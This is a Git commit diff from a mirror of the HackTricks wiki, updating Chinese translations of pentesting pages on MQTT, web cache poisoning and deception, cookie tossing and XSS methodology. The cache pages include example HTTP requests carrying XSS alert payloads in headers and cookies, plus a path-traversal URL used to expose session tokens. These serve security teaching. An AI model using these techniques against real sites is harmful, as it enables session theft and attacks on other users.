maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/1883-pentesting-mqtt-mosqui

Browse Source
This commit is contained in:
Translator 2025-03-24 11:33:11 +00:00
parent c8c57e0f70
commit d6c058f388
4 changed files with 166 additions and 160 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View File

@ -4,7 +4,7 @@
## 基本信息
**MQ Telemetry Transport (MQTT)** 被称为 **发布/订阅消息协议**,以其极简和轻量著称。该协议专门为设备能力有限且在低带宽、高延迟或不可靠连接的网络上运行的环境量身定制。MQTT的核心目标包括最小化网络带宽的使用和减少对设备资源的需求。此外它旨在保持可靠的通信并提供一定程度的交付保证。这些目标使得MQTT特别适合于蓬勃发展的 **机器对机器 (M2M) 通信****物联网 (IoT)** 领域在这些领域中高效连接大量设备至关重要。此外MQTT对移动应用程序也非常有利因为节省带宽和电池寿命至关重要。
**MQ Telemetry Transport (MQTT)** 被称为 **发布/订阅消息协议**,以其极简和轻量化而著称。该协议专门为设备能力有限且在低带宽、高延迟或不可靠连接的网络环境中运行而量身定制。MQTT的核心目标包括最小化网络带宽的使用和减少对设备资源的需求。此外它旨在保持可靠的通信并提供一定程度的交付保证。这些目标使MQTT特别适合于快速发展的 **机器对机器 (M2M) 通信****物联网 (IoT)** 领域在这些领域中高效连接大量设备至关重要。此外MQTT对移动应用程序也非常有利因为节省带宽和电池寿命至关重要。
**默认端口:** 1883
```
@ -15,7 +15,7 @@ PORT STATE SERVICE REASON
当 MQTT 代理收到 **CONNECT** 数据包时,会发送回 **CONNACK** 数据包。该数据包包含一个返回代码,这对于理解连接状态至关重要。返回代码 **0x00** 表示凭据已被接受,标志着连接成功。另一方面,返回代码 **0x05** 表示凭据无效,从而阻止连接。
例如,如果代理因凭据无效而拒绝连接,则场景如下所示:
例如,如果代理因凭据无效而拒绝连接,则场景可能如下所示:
```
{
"returnCode": "0x05",
@ -28,7 +28,7 @@ PORT STATE SERVICE REASON
## 渗透测试 MQTT
**身份验证是完全可选的**,即使进行身份验证,**默认情况下不使用加密**(凭据以明文发送)。仍然可以执行 MITM 攻击以窃取密码。
**身份验证是完全可选的**,即使进行身份验证,**默认情况下不使用加密**(凭据以明文发送)。仍然可以执行中间人攻击以窃取密码。
要连接到 MQTT 服务,可以使用:[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) 并通过以下方式订阅所有主题:
```
@ -73,10 +73,6 @@ client.loop_start()
if __name__ == "__main__":
main()
```
## 更多信息
来自这里: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
### 发布/订阅模式 <a href="#b667" id="b667"></a>
发布/订阅模型由以下组成:
@ -94,7 +90,7 @@ main()
### 数据包类型
- CONNECT (1):由客户端发起,请求与服务器连接。
- CONNECT (1):由客户端发起,请求与服务器建立连接。
- CONNACK (2):服务器对成功连接的确认。
- PUBLISH (3):用于将消息从客户端发送到服务器或反之。
- PUBACK (4)对PUBLISH数据包的确认。

110
src/pentesting-web/cache-deception/README.md
View File

@ -1,31 +1,31 @@
# 缓存中毒和缓存欺骗
# Cache Poisoning and Cache Deception
{{#include ../../banners/hacktricks-training.md}}
## 区别
## The difference
> **Web缓存中毒和Web缓存欺骗之间有什么区别?**
> **web cache poisoning 和 web cache deception 之间有什么区别?**
>
> - 在**Web缓存中毒**中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容会从缓存中提供给其他应用程序用户。
> - 在**Web缓存欺骗**中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
> - 在 **web cache poisoning** 中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容会从缓存中提供给其他应用程序用户。
> - 在 **web cache deception** 中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
## 缓存中毒
## Cache Poisoning
缓存中毒旨在操纵客户端缓存,强迫客户端加载意外、部分或由攻击者控制的资源。影响的程度取决于受影响页面的受欢迎程度,因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
Cache poisoning 旨在操纵客户端缓存,以强制客户端加载意外、部分或由攻击者控制的资源。影响的程度取决于受影响页面的受欢迎程度,因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
执行缓存中毒攻击涉及几个步骤:
执行 cache poisoning 攻击涉及几个步骤:
1. **识别未键入的输入**:这些是参数,尽管不是请求缓存所必需的,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
1. **识别未键入的输入**:这些是参数,尽管不是请求缓存所必需的,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
2. **利用未键入的输入**:在识别未键入的输入后,下一步是弄清楚如何滥用这些参数,以修改服务器的响应,从而使攻击者受益。
3. **确保被污染的响应被缓存**:最后一步是确保被操纵的响应被存储在缓存中。这样,任何在缓存被污染时访问受影响页面的用户将收到被污染的响应。
### 发现检查HTTP头
### Discovery: Check HTTP headers
通常,当响应被**存储在缓存中**时,会有一个**指示的头**,您可以在此帖子中检查您应该关注哪些头[**HTTP缓存头**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
通常,当响应被 **存储在缓存中** 时,会有一个 **指示的头**,您可以在此帖子中检查您应该关注哪些头部:[**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
### 发现:缓存错误代码
### Discovery: Caching error codes
如果您认为响应正在被存储在缓存中,您可以尝试**发送带有错误头的请求**,这应该会以**状态码400**响应。然后尝试正常访问请求,如果**响应是400状态码**您就知道它是脆弱的您甚至可以执行DoS
如果您认为响应正在被存储在缓存中,您可以尝试 **发送带有错误头的请求**,这应该会以 **状态码 400** 响应。然后尝试正常访问请求,如果 **响应是 400 状态码**,您就知道它是脆弱的(您甚至可以执行 DoS
您可以在以下位置找到更多选项:
@ -33,37 +33,37 @@
cache-poisoning-to-dos.md
{{#endref}}
但是,请注意**有时这些状态码不会被缓存**,因此此测试可能不可靠。
但是,请注意 **有时这些状态码不会被缓存**,因此此测试可能不可靠。
### 发现:识别和评估未键入的输入
### Discovery: Identify and evaluate unkeyed inputs
您可以使用[**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)来**暴力破解可能**改变页面响应的**参数和头**。例如,一个页面可能使用头`X-Forwarded-For`来指示客户端从那里加载脚本:
您可以使用 [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)**暴力破解可能会改变页面响应的参数和头部**。例如,一个页面可能使用头部 `X-Forwarded-For` 来指示客户端从那里加载脚本:
```html
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
```
### 引发后端服务器的有害响应
### 从后端服务器引发有害响应
在识别出参数/头部后,检查它是如何被**清洗**的,以及它**在哪里**被**反映**或影响响应。你能以任何方式滥用它吗(执行 XSS 或加载你控制的 JS 代码?执行 DoS...
通过识别的参数/头部检查它是如何被**清理**的,以及**在哪里**被**反映**或影响响应。你能以任何方式滥用它吗执行XSS或加载你控制的JS代码执行DoS...
### 获取响应缓存
### 获取缓存的响应
一旦你**识别**可以被滥用的**页面**,使用哪个**参数**/**头部**以及**如何**滥用它,你需要让页面被缓存。根据你尝试缓存的资源,这可能需要一些时间,你可能需要尝试几秒钟。
一旦你**识别**可以被滥用的**页面**,使用哪个**参数**/**头部**以及**如何**滥用它,你需要让页面被缓存。根据你尝试缓存的资源,这可能需要一些时间,你可能需要尝试几秒钟。
响应中的头部 **`X-Cache`** 可能非常有用,因为当请求未被缓存时,它的值可能是 **`miss`**,而当被缓存时,它的值是 **`hit`**。\
头部 **`Cache-Control`** 也很有趣,可以知道资源是否被缓存,以及下次资源将何时再次被缓存:`Cache-Control: public, max-age=1800`
响应中的头部**`X-Cache`**可能非常有用,因为当请求未被缓存时,它的值可能是**`miss`**,而当被缓存时,它的值是**`hit`**。\
头部**`Cache-Control`**也很有趣,可以知道资源是否被缓存,以及下次资源将何时再次被缓存:`Cache-Control: public, max-age=1800`
另一个有趣的头部是 **`Vary`**。这个头部通常用于**指示额外的头部**,这些头部被视为**缓存键的一部分**,即使它们通常没有键。因此,如果用户知道他所针对的受害者的 `User-Agent`,他可以为使用该特定 `User-Agent` 的用户毒化缓存。
另一个有趣的头部是**`Vary`**。这个头部通常用于**指示额外的头部**,这些头部被视为**缓存键的一部分**,即使它们通常没有键。因此,如果用户知道他所针对的受害者的`User-Agent`,他可以为使用该特定`User-Agent`的用户毒化缓存。
与缓存相关的另一个头部是 **`Age`**。它定义了对象在代理缓存中存在的时间(以秒为单位)。
与缓存相关的另一个头部是**`Age`**。它定义了对象在代理缓存中存在的时间(以秒为单位)。
在缓存请求时,要**小心使用的头部**,因为其中一些可能会被**意外使用**为**键**,而**受害者需要使用相同的头部**。始终使用**不同的浏览器**测试缓存中毒,以检查其是否有效。
在缓存请求时,要**小心使用的头部**,因为其中一些可能会被**意外使用**为**键**,而**受害者需要使用相同的头部**。始终使用**不同的浏览器测试**缓存中毒是否有效。
## 利用示例
### 最简单的示例
`X-Forwarded-For` 这样的头部在响应中未经过清洗地被反映。\
你可以发送一个基本的 XSS 负载并毒化缓存,这样每个访问该页面的人都会受到 XSS 攻击:
`X-Forwarded-For`这样的头部在响应中未经过清理地被反映。\
你可以发送一个基本的XSS有效负载并毒化缓存这样每个访问该页面的人都会受到XSS攻击
```html
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
@ -71,23 +71,31 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
```
_注意这将使对 `/en?region=uk` 的请求中毒,而不是 `/en`_
### 缓存中毒以进行 DoS
### 缓存中毒导致拒绝服务
{{#ref}}
cache-poisoning-to-dos.md
{{#endref}}
### 使用网络缓存中毒来利用 cookie 处理漏洞
### 通过 CDN 进行缓存中毒
Cookies 也可能在页面的响应中被反射。如果你能利用它造成 XSS例如你可能能够在加载恶意缓存响应的多个客户端中利用 XSS。
**[这篇文章](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** 中解释了以下简单场景:
- CDN 将缓存任何位于 `/share/` 下的内容
- CDN 不会解码或规范化 `%2F..%2F`,因此可以用作 **路径遍历以访问其他将被缓存的敏感位置**,例如 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- Web 服务器将解码和规范化 `%2F..%2F`,并将响应 `/api/auth/session`,该响应 **包含身份验证令牌**
### 使用 Web 缓存中毒来利用 Cookie 处理漏洞
Cookies 也可能在页面的响应中被反射。如果你可以利用它造成 XSS例如你可能能够在加载恶意缓存响应的多个客户端中利用 XSS。
```html
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
```
注意,如果易受攻击的 cookie 被用户广泛使用,常规请求将清除缓存。
注意,如果易受攻击的 cookie 被用户频繁使用,常规请求将清除缓存。
### 使用分隔符、规范化和点生成差异 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### 生成带有分隔符、规范化和点的差异 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
检查:
@ -95,9 +103,9 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### 通过路径遍历进行缓存中毒以窃取 API 密钥 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### 通过路径遍历进行缓存污染以窃取 API 密钥 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
[**这篇文章解释了**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) 如何通过一个 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` 的 URL 窃取 OpenAI API 密钥,因为任何匹配 `/share/*` 的内容将被缓存,而 Cloudflare 不会对 URL 进行规范化,这在请求到达 web 服务器时完成
[**这篇文章解释了**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) 如何通过一个 URL 如 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` 窃取 OpenAI API 密钥,因为任何匹配 `/share/*` 的内容都会被缓存,而 Cloudflare 不会对 URL 进行规范化,这在请求到达 web 服务器时会发生
这在以下内容中也有更好的解释:
@ -105,16 +113,16 @@ cache-poisoning-via-url-discrepancies.md
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### 使用多个头部利用 web 缓存中毒漏洞 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### 使用多个头部来利用 web 缓存污染漏洞 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
有时您需要 **利用多个无键输入** 才能滥用缓存。例如,如果您将 `X-Forwarded-Host` 设置为您控制的域名,并将 `X-Forwarded-Scheme` 设置为 `http`,您可能会发现一个 **开放重定向**。**如果** 服务器 **将** 所有 **HTTP** 请求 **转发****HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名。您可以控制重定向指向的页面
有时您需要 **利用多个无键输入** 滥用缓存。例如,如果您将 `X-Forwarded-Host` 设置为您控制的域名,并将 `X-Forwarded-Scheme` 设置为 `http`,您可能会发现一个 **开放重定向**。**如果** 服务器 **将** 所有 **HTTP** 请求 **转发****HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名。您可以控制页面重定向指向。
```html
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
```
### 利用有限的 `Vary`
### 利用有限的 `Vary`
如果你发现 **`X-Host`** 头被用作 **加载 JS 资源的域名**,但响应中的 **`Vary`** 头指示 **`User-Agent`**。那么,你需要找到一种方法来提取受害者的 User-Agent 并使用该用户代理来污染缓存:
```html
@ -136,9 +144,9 @@ report=innocent-victim
```
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### 参数隐藏
### 参数伪装
例如,在 ruby 服务器中,可以使用字符 **`;`** 来分隔 **参数**而不是 **`&`**。这可以用来将无键参数值放入有键参数中并进行滥用。
例如,在 ruby 服务器中,可以使用字符 **`;`** 而不是 **`&`** 来分隔 **参数**。这可以用来将无键参数值放入有键参数中并加以利用。
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
@ -150,21 +158,21 @@ Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/explo
[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) 可用于自动测试 Web 缓存中毒。它支持多种不同的技术,并且高度可定制。
示例用法: `wcvs -u example.com`
示例用法 `wcvs -u example.com`
## 漏洞示例
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
ATS 在 URL 中转发了片段而没有去掉它,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 `/#/../?r=javascript:alert(1)` 被发送到后端为 `/#/../?r=javascript:alert(1)`,而缓存键中没有负载,仅有主机、路径和查询。
ATS 在不去除 URL 中片段的情况下转发了片段,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 `/#/../?r=javascript:alert(1)` 被发送到后端为 `/#/../?r=javascript:alert(1)`,而缓存键中没有负载,仅有主机、路径和查询。
### GitHub CP-DoS
内容类型头中发送错误值触发了 405 缓存响应。缓存键包含 cookie因此只能攻击未授权用户。
content-type 头中发送错误值触发了 405 缓存响应。缓存键包含 cookie因此只能攻击未授权用户。
### GitLab + GCP CP-DoS
GitLab 使用 GCP 存储桶来存储静态内容。**GCP 存储桶** 支持 **头部 `x-http-method-override`**。因此,可以发送头部 `x-http-method-override: HEAD` 并使缓存返回空响应体。它还可以支持 `PURGE` 方法。
GitLab 使用 GCP 存储桶来存储静态内容。**GCP 存储桶** 支持 **头部 `x-http-method-override`**。因此,可以发送头部 `x-http-method-override: HEAD` 并使缓存中毒以返回空响应体。它还可以支持 `PURGE` 方法。
### Rack 中间件 (Ruby on Rails)
@ -176,15 +184,15 @@ Cloudflare 之前缓存了 403 响应。尝试使用错误的授权头访问 S3
### 注入键参数
缓存通常在缓存键中包含特定的 GET 参数。例如Fastly 的 Varnish 在请求中缓存了 `size` 参数。然而,如果发送了 URL 编码版本的参数(例如 `siz%65`)并且值错误,缓存键将使用正确的 `size` 参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 `size` 参数进行 URL 编码导致缓存省略它,但后端使用了它。将该参数的值设置为 0 会导致可缓存的 400 错误请求。
缓存通常在缓存键中包含特定的 GET 参数。例如Fastly 的 Varnish 在请求中缓存了 `size` 参数。然而,如果还发送了 URL 编码版本的参数(例如,`siz%65`)并带有错误值,则缓存键将使用正确的 `size` 参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 `size` 参数进行 URL 编码导致缓存省略它,但后端使用了它。将该参数的值设置为 0 会导致可缓存的 400 错误请求。
### 用户代理规则
一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei匹配的用户代理的请求以管理服务器负载。讽刺的是这种方法可能引入漏洞,例如缓存中毒和 DoS
一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei匹配的用户代理的请求以管理服务器负载。讽刺的是这种方法可能引入诸如缓存中毒和 DoS 等漏洞
### 非法头字段
[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) 指定了头名称中可接受的字符。包含超出指定 **tchar** 范围的字符的头应理想地触发 400 错误请求响应。在实践中,服务器并不总是遵循此标准。一个显著的例子是 Akamai它转发包含无效字符的头并缓存任何 400 错误,只要 `cache-control` 头不存在。发现了一种可利用的模式,发送包含非法字符(如 `\`)的头会导致可缓存的 400 错误请求。
[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) 指定了头名称中可接受的字符。包含超出指定 **tchar** 范围的字符的头理想情况下应触发 400 错误请求响应。在实践中,服务器并不总是遵循此标准。一个显著的例子是 Akamai它转发包含无效字符的头并缓存任何 400 错误,只要 `cache-control` 头不存在。发现了一种可利用的模式,发送包含非法字符(如 `\`)的头会导致可缓存的 400 错误请求。
### 查找新头
@ -194,7 +202,7 @@ Cloudflare 之前缓存了 403 响应。尝试使用错误的授权头访问 S3
缓存欺骗的目标是使客户端 **加载将被缓存保存的敏感信息的资源**
首先要注意的是,**扩展名**如 `.css``.js``.png` 等通常被 **配置****保存****缓存** 中。因此,如果您访问 `www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到 `.js` **扩展名**。但是,如果 **应用程序** 正在 **重放** 存储在 _www.example.com/profile.php_ 中的 **敏感** 用户内容,您可以 **窃取** 其他用户的这些内容。
首先要注意的是,**扩展名**如 `.css``.js``.png` 等通常被 **配置****保存****缓存** 中。因此,如果您访问 `www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到 `.js` **扩展名**。但是,如果 **应用程序** 正在 **重放** 存储在 _www.example.com/profile.php_ 中的 **敏感** 用户内容,您可以 **窃取** 其他用户的这些内容。
其他测试内容:
@ -206,16 +214,16 @@ Cloudflare 之前缓存了 403 响应。尝试使用错误的授权头访问 S3
- _使用不太常见的扩展名如_ `.avif`
另一个非常清晰的例子可以在这篇文章中找到:[https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
在这个例子中,解释了如果您加载一个不存在的页面,如 _http://www.example.com/home.php/non-existent.css_,将返回 _http://www.example.com/home.php_ (**带有用户的敏感信息**) 的内容,并且缓存服务器将保存结果。\
然后,**攻击者**可以在自己的浏览器中访问 _http://www.example.com/home.php/non-existent.css_ 并观察之前访问过的用户的 **机密信息**
在这个例子中,解释了如果您加载一个不存在的页面,如 _http://www.example.com/home.php/non-existent.css_,将返回 _http://www.example.com/home.php_ (**包含用户的敏感信息**),并且缓存服务器将保存结果。\
然后,**攻击者** 可以在自己的浏览器中访问 _http://www.example.com/home.php/non-existent.css_ 并观察之前访问过的用户的 **机密信息**
请注意,**缓存代理** 应该 **配置****缓存** 文件 **基于** 文件的 **扩展名** (_.css_) 而不是基于内容类型。在示例 _http://www.example.com/home.php/non-existent.css_ 中,将具有 `text/html` 内容类型,而不是 `text/css` MIME 类型(这是 _.css_ 文件的预期类型)。
请注意,**缓存代理** 应该 **配置****根据** 文件的 **扩展名** (_.css_) **缓存** 文件,而不是根据内容类型。在示例 _http://www.example.com/home.php/non-existent.css_ 中,将具有 `text/html` 内容类型,而不是 `text/css` MIME 类型(这是 _.css_ 文件的预期类型)。
在这里了解如何执行 [利用 HTTP 请求走私进行缓存欺骗攻击](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception)。
## 自动化工具
- [**toxicache**](https://github.com/xhzeem/toxicache): Golang 扫描器,用于在 URL 列表中查找 Web 缓存中毒漏洞并测试多种注入技术。
- [**toxicache**](https://github.com/xhzeem/toxicache)Golang 扫描器,用于在 URL 列表中查找 Web 缓存中毒漏洞并测试多种注入技术。
## 参考文献

17
src/pentesting-web/hacking-with-cookies/cookie-tossing.md
View File

@ -13,22 +13,23 @@
这可能是危险的,因为攻击者可能能够:
- **将受害者的cookie固定到攻击者的账户**,因此如果用户没有注意到,**他将在攻击者的账户中执行操作**,攻击者可能获得一些有趣的信息(检查用户在平台上的搜索历史,受害者可能在账户中设置他的信用卡...
- 如果**cookie在登录后没有改变**,攻击者可能只需**固定一个cookie会话固定**,等待受害者登录,然后**使用该cookie以受害者身份登录**。
- **将受害者的cookie固定到攻击者的账户**,因此如果用户没有注意,**他将在攻击者的账户中执行操作**,攻击者可能会获得一些有趣的信息(查看用户在平台上的搜索历史,受害者可能会在账户中设置他的信用卡...
- 这个例子[可以在这里找到](https://snyk.io/articles/hijacking-oauth-flows-via-cookie-tossing/),其中攻击者在受害者将用于授权**访问其git仓库的特定部分**中设置了他的cookie但从攻击者的账户中因为他将在所需的端点中设置他的cookie。
- 如果**cookie在登录后没有改变**,攻击者可能只需**固定一个cookie会话固定**,等待受害者登录,然后**使用该cookie以受害者的身份登录**。
- 有时即使会话cookie发生变化攻击者也会使用之前的cookie并且他也会收到新的cookie。
- 如果**cookie设置了一些初始值**例如在flask中**cookie**可能**设置**会话的**CSRF令牌**,并且该值将在受害者登录后保持),**攻击者可能设置这个已知值然后加以利用**在这种情况下攻击者可能会让用户执行CSRF请求因为他知道CSRF令牌
- 如果**cookie设置了一些初始值**例如在flask中**cookie**可能**设置**会话的**CSRF令牌**,并且该值将在受害者登录后保持),**攻击者可能会设置这个已知值,然后滥用它**在这种情况下攻击者可能会让用户执行CSRF请求因为他知道CSRF令牌
- 就像设置值一样攻击者也可以获取服务器生成的未认证cookie从中获取CSRF令牌并使用它。
### Cookie顺序
当浏览器接收到两个具有相同名称的cookie**部分影响相同范围**(域、子域和路径)时,**浏览器将在请求有效时发送两个cookie的值**。
当浏览器接收到两个具有相同名称的cookie**部分影响相同范围**(域、子域和路径)时,**浏览器将在请求有效时发送两个cookie的值**。
根据谁具有**最具体的路径**或哪个是**最旧的**,浏览器将**首先设置cookie的值**,然后设置另一个的值,如:`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
大多数**网站只会使用第一个值**。因此如果攻击者想要设置一个cookie最好在另一个cookie被设置之前设置它或者设置一个更具体的路径
大多数**网站只会使用第一个值**。因此如果攻击者想要设置一个cookie最好在另一个cookie被设置之前设置它或者使用更具体的路径设置它
> [!WARNING]
> 此外,**在更具体的路径中设置cookie的能力**非常有趣,因为您将能够让**受害者在cookie中工作除了恶意cookie设置将被发送之前的特定路径**。
> 此外,**在更具体的路径中设置cookie的能力**非常有趣,因为您将能够让**受害者在他的cookie中工作除了恶意cookie设置将被发送之前的特定路径**。
### 保护绕过
@ -54,8 +55,8 @@ cookie-bomb.md
#### **在cookie名称中使用前缀`__Host`**
- 如果cookie名称具有此前缀**只有在标记为安全、从安全来源发送、不包括域属性并且路径属性设置为/**时,**它将被接受**在Set-Cookie指令中。
- **这防止子域强制cookie到顶级域因为这些cookie可以被视为“域锁定”**
- 如果cookie名称具有此前缀**只有在标记为安全、从安全来源发送、不包括域属性并且路径属性设置为/**时,才**会被接受**在Set-Cookie指令中。
- **这防止子域强制cookie到顶级域因为这些cookie可以被视为“域锁定”**
### 参考

187
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1,31 +1,31 @@
# XSS (跨站脚本攻击)
# XSS (跨站脚本)
## 方法论
1. 检查 **任何你控制的值** (_参数_、_路径_、_头部_?、_cookies_?) 是否在 HTML 中被 **反射****被** **JS** 代码 **使用**
1. 检查 **任何你控制的值** (_参数__路径__头部__cookies_) 是否在 HTML 中被 **反射****被** **JS** 代码 **使用**
2. **找到上下文**,查看它是如何被反射/使用的。
3. 如果 **被反射**
1. 检查 **你可以使用哪些符号**,并根据此准备有效载荷:
1. 在 **原始 HTML** 中:
1. 你能创建新的 HTML 标签吗?
2. 你能使用支持 `javascript:` 协议的事件或属性吗?
3. 你能绕过保护措施吗?
4. HTML 内容是否被任何客户端 JS 引擎 (_AngularJS_、_VueJS_、_Mavo_...) 解释,你可以利用 [**客户端模板注入**](../client-side-template-injection-csti.md)。
5. 如果你不能创建执行 JS 代码的 HTML 标签,你能利用 [**悬挂标记 - 无脚本 HTML 注入**](../dangling-markup-html-scriptless-injection/index.html) 吗?
2. 在 **HTML 标签**
1. 你能退出到原始 HTML 上下文吗?
2. 你能创建新的事件/属性来执行 JS 代码吗?
3. 你被困的属性是否支持 JS 执行?
4. 你能绕过保护措施吗?
3. 在 **JavaScript 代码**
1. 你能逃逸 `<script>` 标签吗?
2. 你能逃逸字符串并执行不同的 JS 代码吗?
3. 你的输入是否在模板字面量 \`\` 中?
4. 你能绕过保护措施吗?
4. 被 **执行的** Javascript **函数**
1. 你可以指明要执行的函数名称。例如: `?callback=alert(1)`
4. 如果 **被使用**
1. 你可以利用 **DOM XSS**,注意你的输入是如何被控制的,以及你的 **受控输入是否被任何接收器使用**
1. 检查 **你可以使用哪些符号**,并根据此准备有效载荷:
1. 在 **原始 HTML** 中:
1. 你能创建新的 HTML 标签吗?
2. 你能使用支持 `javascript:` 协议的事件或属性吗?
3. 你能绕过保护吗?
4. HTML 内容是否被任何客户端 JS 引擎 (_AngularJS__VueJS__Mavo_...) 解释,你可以利用 [**客户端模板注入**](../client-side-template-injection-csti.md)。
5. 如果你不能创建执行 JS 代码的 HTML 标签,你能利用 [**悬挂标记 - 无脚本 HTML 注入**](../dangling-markup-html-scriptless-injection/index.html) 吗?
2. 在 **HTML 标签**
1. 你能退出到原始 HTML 上下文吗?
2. 你能创建新的事件/属性来执行 JS 代码吗?
3. 你被困的属性是否支持 JS 执行?
4. 你能绕过保护吗?
3. 在 **JavaScript 代码**
1. 你能逃逸 `<script>` 标签吗?
2. 你能逃逸字符串并执行不同的 JS 代码吗?
3. 你的输入是否在模板字面量 \`\` 中?
4. 你能绕过保护吗?
4. Javascript **函数** 被 **执行**
1. 你可以指明要执行的函数名称。例如: `?callback=alert(1)`
4. 如果 **被使用**
1. 你可以利用 **DOM XSS**,注意你的输入是如何被控制的,以及你的 **受控输入是否被任何接收器使用**
在处理复杂的 XSS 时,你可能会发现了解以下内容很有趣:
@ -35,31 +35,31 @@ debugging-client-side-js.md
## 反射值
为了成功利用 XSS你需要找到的第一件事是 **一个由你控制的值在网页中被反射**。
为了成功利用 XSS首先你需要找到一个 **由你控制的值,它在网页中被反射**。
- **中间反射**:如果你发现参数的值甚至路径在网页中被反射,你可以利用 **反射 XSS**。
- **存储并反射**:如果你发现一个由你控制的值被保存在服务器中,并且每次访问页面时都会被反射,你可以利用 **存储 XSS**。
- **通过 JS 访问**:如果你发现一个由你控制的值通过 JS 访问,你可以利用 **DOM XSS**
- **中间反射**:如果你发现一个参数的值甚至路径在网页中被反射,你可以利用 **反射 XSS**。
- **存储并反射**:如果你发现一个由你控制的值被保存在服务器中,并且每次访问页面时都会被反射,你可以利用 **存储 XSS**。
- **通过 JS 访问**:如果你发现一个由你控制的值正在通过 JS 访问,你可以利用 **DOM XSS**
## 上下文
在尝试利用 XSS 时,你需要知道的第一件事是 **你的输入被反射在哪里**。根据上下文,你将能够以不同的方式执行任意 JS 代码。
在尝试利用 XSS 时,首先你需要知道 **你的输入在哪里被反射**。根据上下文,你将能够以不同的方式执行任意 JS 代码。
### 原始 HTML
如果你的输入在 **原始 HTML** 页面中被 **反射**,你需要利用某些 **HTML 标签** 来执行 JS 代码:`<img`、`<iframe``<svg``<script` ... 这些只是你可以使用的许多可能的 HTML 标签中的一些。\
